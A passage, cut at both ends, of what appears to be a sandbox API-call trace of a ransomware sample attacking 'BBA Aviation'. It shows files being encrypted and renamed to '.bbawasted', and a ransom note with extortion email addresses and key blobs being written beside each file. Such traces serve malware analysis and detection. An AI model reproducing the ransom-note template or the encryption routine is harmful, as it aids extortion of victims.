(lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\lock.png") returned 45 [0238.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6c4b88 [0238.849] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.849] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0238.850] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0238.850] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0238.850] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\lock.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0239.098] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.099] SetEndOfFile (hFile=0x27c) returned 1 [0239.099] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0239.100] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\lock.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\lock.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png.bbawasted")) returned 1 [0239.101] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\lock.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0239.101] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0239.101] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe5d [0239.102] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe5d) returned 0x600000 [0239.102] CloseHandle (hObject=0x28c) returned 1 [0239.104] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0239.104] CloseHandle (hObject=0x280) returned 1 [0239.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0239.104] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0239.105] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0239.105] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0239.105] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0239.105] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0239.105] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0239.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0239.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0239.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.118] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MysXl1pRuX8TMDl0zymld5olS2mWpKt6fHRU+lJBBvPwN6XDeSfu68+5fmIu386Q\r\nJfhdMgBXMGB0T10P64UNjCCHnZFpaf8o+K2GkWSJn6KBIuTMXu9X9hNsvw+3vjZu\r\nBTPNTR+atqzgybL4fsujXo6W9wx3ZIsBOF7swySV4LKT+LX+4gePoSF7tmeYo38Q\r\nSbxqFIgds9dSwAaTW3XIDdSoDGtbljLo12Op1ZHN+NA1nKsGqUODQwrvetnoa3Sg\r\nhqgj2ynfuZ5ryTA2J6pNEH6fAgF3Yd4XtTbUgJzqWniT3oFYNP4JxGU1leZWIJUD\r\nBxLbt3Hz2gf+7BMilanKUGXCSYagSQHnFATcVkEnEij4N4IUWpg8oM0SU2ctJWcL\r\nODIR5w4yNPV4I6uDVlvyR7U62dBADfnYORBwTrgQjGUjbShxGUbFXkkFwwLE6uge\r\n/lh3BG59sdwQVnqLooXowT6JbFyeQ+J3Sd1JLhJeBQcTl3/NhPP80xZUaIerifrL\r\nJSKpq4RdAnrGKjDKlJuDcKlLs6qfKjl7PXHJ8/9221HVSjjCKIsLYNph9/bHiITv\r\n2KIEMklp0rPp/SO6Lwvjdu0eEE5KFq5kHMm0Tc+EYjX2906LIlexwASw+bZxEkN1\r\n7x8I15cSwLHhvr6BEdZHru4qOUJjyfcCgwPpiYTrNoX=[end_key]\r\nKEEP IT\r\n") returned 984 [0239.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0239.119] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0239.119] SetEndOfFile (hFile=0x27c) returned 1 [0239.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.122] CloseHandle (hObject=0x27c) returned 1 [0239.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0239.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bd0a8 | out: hHeap=0x660000) returned 1 [0239.122] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0239.123] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0239.123] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0239.123] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\marketing.png") returned 50 [0239.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a1f58 [0239.123] lstrcpyW (in: lpString1=0x6a1fbc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0239.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.123] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0239.124] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0239.124] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0239.124] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\marketing.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0239.125] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.126] SetEndOfFile (hFile=0x27c) returned 1 [0239.126] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.126] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.126] lstrcpyW (in: lpString1=0x6a1fbc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\marketing.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\marketing.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png.bbawasted")) returned 1 [0239.146] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\marketing.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0239.146] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0239.146] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1ed [0239.146] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ed) returned 0x5f0000 [0239.146] CloseHandle (hObject=0x280) returned 1 [0239.147] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0239.147] CloseHandle (hObject=0x290) returned 1 [0239.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0239.147] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0239.148] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0239.148] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0239.148] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0239.149] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0239.149] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0239.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0239.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0239.160] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0239.160] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]a5MeyKa3SQqVE0MnEHTJY8JqmpB/tOFMTvRUaWzFTFRGbkMUNofUrUq5Gtv+darG\r\nTpdgSqavlIoGHjlXwo5oDy3TPVKwLDKnpcEff15mVs+3Kx+iLUN4vyl6vUlR85CX\r\nPvirveonTgOiHobwdsL2L1WCADcoqp9mPslP5oiJAMRB9GxssHfeYasXd/FfwEXe\r\nSitcnfyovzYursBDnG4FIVxzFUqw+lxh49+tjmW6aVFxWJ3QjjebRkA+Z/Rdpu1h\r\nfciLSvMn0qGVnjSiUTqmdlM9doMxCkaygBtC/I6a1sqOenwit2kZROfB2ipvicdf\r\nQHFO4uj1sh0lwX7sMX4x8d1VD5KA/49Iqo7OIK/jxMNP7VRiqhN+H9aDPUlB1Fm8\r\nyoMupVS8I/LD2t3rV+KiD/8DpszJuO/LG0BQQ79wBD7z84dkpvsUs0aWqWNuNZ/T\r\n3DSOACo3mgP2FZWaixjxb1oozLxBxOf/j6cS+m+kkvBe5So+swTm7betQPEn3KA/\r\n/nWEKApgVPtKtEYTebienq4pvUCd77V3e6OG+FTmP0gHl7l2et+ec5usEInmf9Yz\r\nN4XY+YGe0ZWoExHFeyW6daS4iyzhcwxz+6rc2c4ywPHh9qL9FALrz53/Ag30ZQkj\r\nWdkf6riWJlDe+IMI4DG56ELC91UuhAbuELVCkR5s5PZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0239.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0239.160] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0239.160] SetEndOfFile (hFile=0x27c) returned 1 [0239.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0239.247] CloseHandle (hObject=0x27c) returned 1 [0239.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1f58 | out: hHeap=0x660000) returned 1 [0239.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3070 | out: hHeap=0x660000) returned 1 [0239.248] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0239.248] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0239.248] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0239.248] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js") returned 63 [0239.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x288) returned 0x6ad900 [0239.249] lstrcpyW (in: lpString1=0x6ad97e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0239.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0239.249] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0239.249] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0239.249] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0239.249] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0239.251] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.252] SetEndOfFile (hFile=0x27c) returned 1 [0239.252] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0239.253] lstrcpyW (in: lpString1=0x6ad97e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js.bbawasted")) returned 1 [0239.306] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0239.306] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0239.306] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1395c6 [0239.306] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1395c6) returned 0x14d0000 [0239.307] CloseHandle (hObject=0x280) returned 1 [0240.798] UnmapViewOfFile (lpBaseAddress=0x14d0000) returned 1 [0240.916] CloseHandle (hObject=0x28c) returned 1 [0240.916] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0240.916] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0240.917] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0240.917] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0240.918] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0240.918] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0240.918] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0240.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0240.929] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0240.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0240.929] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OQm/5dCaV127bxb+qRiL/AjxNKGWJa2H/yR8cYzUT8vzHyR4UZEUVVsWElfbIVP+\r\nUaMtVVA2tgfUTemalOeiyII49IlH28ndAl5zp88ZKRPuviNyz33JvrcjKFDFnaCx\r\n2gjCntnfkRR2AJ7zy1y+yhniNmAma54+KzyaSKe0O+DqRfZnOxUQ9rR+eeSIymTQ\r\n44EnnVuK6qv3Ls2rmdQ2eKSWCiSnqNe2AU28DC6BF85mzsjfrayasFOFhKOo3eoH\r\ns6sCaD/JPB/j1GcTT/msX8fgWXl5/qcegpwxZRxN3373gE95gFeOZIPoLjqNBL0e\r\nQrwVN1On+vxsiOvR9L0sNQl0sCQNtF2zPiyT1nE4V4AdRXRdOge1tsXciezHCxZ0\r\nfVTjSC+LBNNbTqCsVosSVTOLskFq/WtD8Gpo64XCsbBY8Ide6HNFMAuFu38tC8eW\r\ndDkTaHhj5UU3XqECHEaA69682fwjrRgyBzvZIT/ELyh/QWFgvHs8Sfcira00UVu5\r\nJ8AeWLTcL5FCTEwgsMR76f8tAkuh9flekauitDwFTgelUopRWeBZGau4lq/D5R+l\r\n+2WN5/mUwO+TKhcV8GAFPVHgScOFUrRYlK3Su4qiJa4djQmcMXtv9C0Iff4QNH32\r\niFNl4XJffvdjpli0YRv5sgaJ+UpI+xLuwOe17JM4IUY=[end_key]\r\nKEEP IT\r\n") returned 984 [0240.929] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0240.929] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0240.930] SetEndOfFile (hFile=0x27c) returned 1 [0240.934] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0240.934] CloseHandle (hObject=0x27c) returned 1 [0240.935] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0240.935] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x660000) returned 1 [0240.935] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0240.936] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0240.936] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0240.936] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht") returned 56 [0240.936] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ad900 [0240.936] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0240.937] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0240.937] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0240.937] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0240.937] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0240.937] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0240.938] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0240.940] SetEndOfFile (hFile=0x27c) returned 1 [0240.940] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0240.940] lstrcpyW (in: lpString1=0x6ad970, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0240.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht.bbawasted")) returned 1 [0240.941] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0240.941] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0240.941] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x97e0d [0240.942] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97e0d) returned 0x1480000 [0240.942] CloseHandle 